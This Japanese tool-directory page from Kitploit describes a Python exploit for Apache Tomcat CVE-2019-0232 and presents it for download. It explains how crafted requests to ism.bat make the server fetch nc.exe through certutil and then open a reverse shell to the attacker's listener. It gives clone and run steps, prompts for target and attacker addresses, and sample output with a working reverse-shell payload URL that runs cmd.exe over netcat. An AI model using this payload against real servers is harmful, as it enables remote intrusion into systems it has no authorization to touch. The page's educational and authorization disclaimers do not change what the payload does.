Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-0232 — こんにちは、これはCVE-2019-0232の改訂・拡張版コードです。 | Kitploit
ツール/GitHubGitHub/dharan10/cve-2019-0232
ペイロード生成エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールリモートアクセスツール
GitHubdharan10/cve-2019-0232

CVE-2019-0232

こんにちは、これはCVE-2019-0232の改訂・拡張版コードです。

リポジトリを見る
221年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Apache Tomcat CVE-2019-0232 のエクスプロイト

このスクリプトは、Apache Tomcat の CVE-2019-0232 脆弱性を悪用します。この脆弱性により、ism.bat スクリプトの不適切な処理を通じてリモートコード実行が可能になります。スクリプトは certutil と nc.exe(Netcat)を使用したリバースシェル技法を活用し、脆弱なシステムへのリモートアクセスを取得します。

脆弱性の概要:

  • CVE ID: CVE-2019-0232
  • 影響を受ける製品: Apache Tomcat 6.x、7.x、8.x、9.x
  • 説明:
    • CVE-2019-0232 は、Apache Tomcat における ism.bat へのリクエスト処理の脆弱性で、攻撃者がサーバー上で任意のコマンドを実行できる可能性があります。この脆弱性は、ユーザー入力の適切な検証が欠如しているために発生し、攻撃者は特別に細工されたリクエストを通じて任意のコマンドの実行を引き起こすことができます。
    • この脆弱性は、リモートサーバーから悪意のある nc.exe ファイルをダウンロードし、それを用いてリバースシェルを起動するために悪用される可能性があります。

要件:

  • Python 3: このスクリプトは Python 3.x 用に設計されています。
  • Netcat: リバースシェル接続のために、Netcat リスナー(nc.exe)をサーバー上でホストする必要があります。
  • Apache Tomcat: 対象サーバーは、CVE-2019-0232 の影響を受ける脆弱なバージョンの Apache Tomcat(6.x、7.x、8.x、または 9.x)を実行している必要があります。

動作の仕組み:

  1. nc.exe のダウンロード: スクリプトは、脆弱な Tomcat サーバーに細工したリクエストを送信し、certutil を使用して nc.exe(Netcat)ファイルをターゲットマシンにダウンロードさせます。
  2. リバースシェル: nc.exe がダウンロードされると、別のリクエストを送信してリバースシェルコマンドを実行し、攻撃者の Netcat リスナーに接続を返します。

使用方法:

1. リポジトリをクローンします:

root@kitploit:~
git clone https://github.com/Dharan10/CVE-2019-0232.git
cd CVE-2019-0232

2. スクリプトを編集するか、ユーザー入力で実行します:

root@kitploit:~
python3 exploit.py

3. 以下の詳細を入力するよう求められます:

root@kitploit:~
ターゲットホスト: 攻撃対象の Apache Tomcat サーバーの IP アドレス。
ターゲットポート: 対象サーバーのポート(デフォルト: 8080)。
サーバー IP: nc.exe をホストしているサーバーの IP アドレス。
サーバーポート: nc.exe がホストされているポート番号(デフォルト: 80)。
Netcat リスナー IP: リバースシェルを受け取るあなたの IP アドレス。
Netcat リスナーポート: リバースシェルを待ち受けるポート。

例:

root@kitploit:~
[*] Sending payload to download nc.exe...
[+] URL1 Response: 200
[*] Sending payload to execute reverse shell...
[+] URL2 Response: 200
[*] Reverse shell payload URL: http://192.168.1.10:8080/cgi/ism.bat?&nc.exe+192.168.1.100+1234+-e+cmd.exe

正常に実行されると、Netcat リスナーにリバースシェル接続が返ってくるはずです。

免責事項:

このスクリプトは教育目的のみを意図しています。悪意のある活動に使用しないでください。ペネトレーションテストやセキュリティ監査を実施する前に、必ず適切な許可を取得してください。このスクリプトの誤用は法的結果を招く可能性があります。

重要な注意事項:

このエクスプロイトを使用する前に、Apache Tomcat サーバーが CVE-2019-0232 に対してパッチ適用されていないことを確認してください。 ターゲットシステムの構成によっては、スクリプトに管理者権限が必要になる場合があります。

作成者:

作成者: A!Z3N(Dharan) Made with power!

ライセンス:

このプロジェクトは MIT ライセンス の下でライセンスされています。

ただし、自己責任で使用してください。このコードは教育目的のみで提供されています。このコードを使用することにより、その使用に起因するすべての行動に対して全責任を負うことに同意したものとみなされます。このエクスプロイトの誤用または許可なく使用すると、法的結果を招く可能性があります。システム上でセキュリティテストやペネトレーションテストを実施する前に、常に適切な許可を取得してください。

このコードの使用、修正、配布は自由ですが、倫理的な目的に限ります。作成者はこのコードによって生じたいかなる損害についても責任を負いません。

対象システムの所有者の明示的な許可なしにこのエクスプロイトを使用しないでください。

ツールをダウンロード